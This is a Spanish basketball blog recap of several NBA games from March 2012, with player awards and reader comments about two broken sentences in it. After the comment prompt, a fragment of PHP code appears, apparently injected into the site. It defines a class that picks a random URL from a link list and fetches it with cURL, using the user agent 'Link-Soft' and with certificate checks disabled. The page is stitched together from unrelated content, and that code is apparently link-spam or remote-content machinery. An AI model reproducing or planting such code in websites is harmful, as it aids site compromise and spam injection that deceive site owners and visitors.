La Crónica: Irreconocibles Mavs

30 de March de 2012 por TheDeerHunter

Espíritu de revancha en la reedición de las pasadas finales. Ha llovido tanto que cuesta creer que fuera este enfrentamiento el que decidió el anillo del 2011. Unos Heat al tran-tran abusaron de los Mavericks, donde únicamente podíamos reconocer a Nowitzki. Nada que ver los Terry o Marion de hoy con los de hace menos de un año. Pudo ser peor el revolcón, ya que Odom y Wright cuajaron una actuación bastante más digna que las habituales (85-106).

Volvía Fisher al Staples como visitante, ante una afición rendida a su figura. De fondo se trataba de despejar dudas sobre quién son los favoritos de conferencia tras los últimos movimientos. La realidad golpea nuevamente a los de dorado y púrpura por si alguien se había creído que algo así puede resolverse de la noche a la mañana. La gran virtud de esta liga es que un despojo como eran los Thunder hace apenas un lustro se ha convertido en el coco intratable ante el que nos encontramos. Westbrook se hizo un bocadillo y no teníamos al pescador para poner excusas. Mal partido de Pau, tercer cuarto demoledor de los visitantes y tema aclarado de cara a la postemporada (102-93). Mucho tienen que mejorar los Lakers para aspirar a superar este hipotético cruce, o mucho deberían empeorar los actuales líderes. No es probable ni una cosa ni la otra.

Los Pacers ganaron con más dificultades de las previstas a Wizards (89-93). La gran versión de Granger posibilitó el resultado. Por último también trabajada victoria de los Blazers ante Hornets, en medio de ciertos rumores de venta de los de Oregon (93-99). Bonito duelo doble: Aldridge vs Landry y Matthews vs Benilelli.

PREMIOS

MVP: Los Lakers aún estando a Russell Westbrook. El base de los Thunder les endosó 36 puntos. Lamarcus Aldridge se fue a los 25 puntos, 12 rebotes y 5 asistencias en la victoria de los Blazers frente los Hornets.

Rookie: Por rookie no me viene nada. En todo caso, los 10 puntitos de Norris Cole o los 8 de Chris Singleton.

Sorpresa: En ausencia de Jarrett Jack el caudal ofensivo de los Hornets pasó por las manos de Marco Bellinelli. El italiano consiguió 27 puntos. A Luke Babbit le dieron 17 minutos y los aprovechó a la perfección con 16 puntos.

Decepción: Jason Terry lo fue todo ayer pero una amenaza desde el banco. 1 de 10 en tiros de campo para el escolta de los Mavs.

Esfuerzo en vano: Una vez más el pívot de los Lakers, Andrew Bynum, fue el más destacado de su equipo. Anoche consiguió 25 puntos, 13 rebotes, 4 tapones y un 0 de 0 en triples (algo muy aplaudido por Mike Brown). Aún así probó el amargo sabor de la derrota.

TOP-10

Imágenes | AP Photos / Getty Images

Comenta

5 comentarios a esta entrada

  1. nba dice:
    #1

    Ninguna sorpresa por lo que veo, alguien sabe si a lo largo de la temporada en el algun partido de Lakers , han sido capaces de ganar el parcial del 2º cuarto

      Citar

  2. Rodri dice:
    #2

    No termino de entender un par de frases:

    “Los Lakers aún estando a Russell Westbrook.”
    “Jason Terry lo fue todo ayer pero una amenaza desde el banco.”

    Me da a mi que habéis dado a la tecla Suprimir sin daros cuenta. Un saludo.

      Citar

  3. infante dice:
    #3

    Rodri:
    No termino de entender un par de frases:

    “Los Lakers aún estando a Russell Westbrook.”
    “Jason Terry lo fue todo ayer pero una amenaza desde el banco.”

    Me da a mi que habéis dado a la tecla Suprimir sin daros cuenta. Un saludo.

    la segunda expresion parece traducida literalmente del ingles “Jason Terry was nothing but a threaten” pero justo significa lo contrario

      Citar

  4. simon dice:
    #4

    Rodri:
    No termino de entender un par de frases:

    “Los Lakers aún estando a Russell Westbrook.”
    “Jason Terry lo fue todo ayer pero una amenaza desde el banco.”

    Me da a mi que habéis dado a la tecla Suprimir sin daros cuenta. Un saludo.

    imagino que la primera se referira que aun teniendo a Session y sin el dinosaurio de Fisher los bases rivales siguen haciendolos polvo…

      Citar

  5. melo15 dice:
    #5

    La segunda quiere decir que Terry, lo fue todo menos una amenaza desde el banco

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>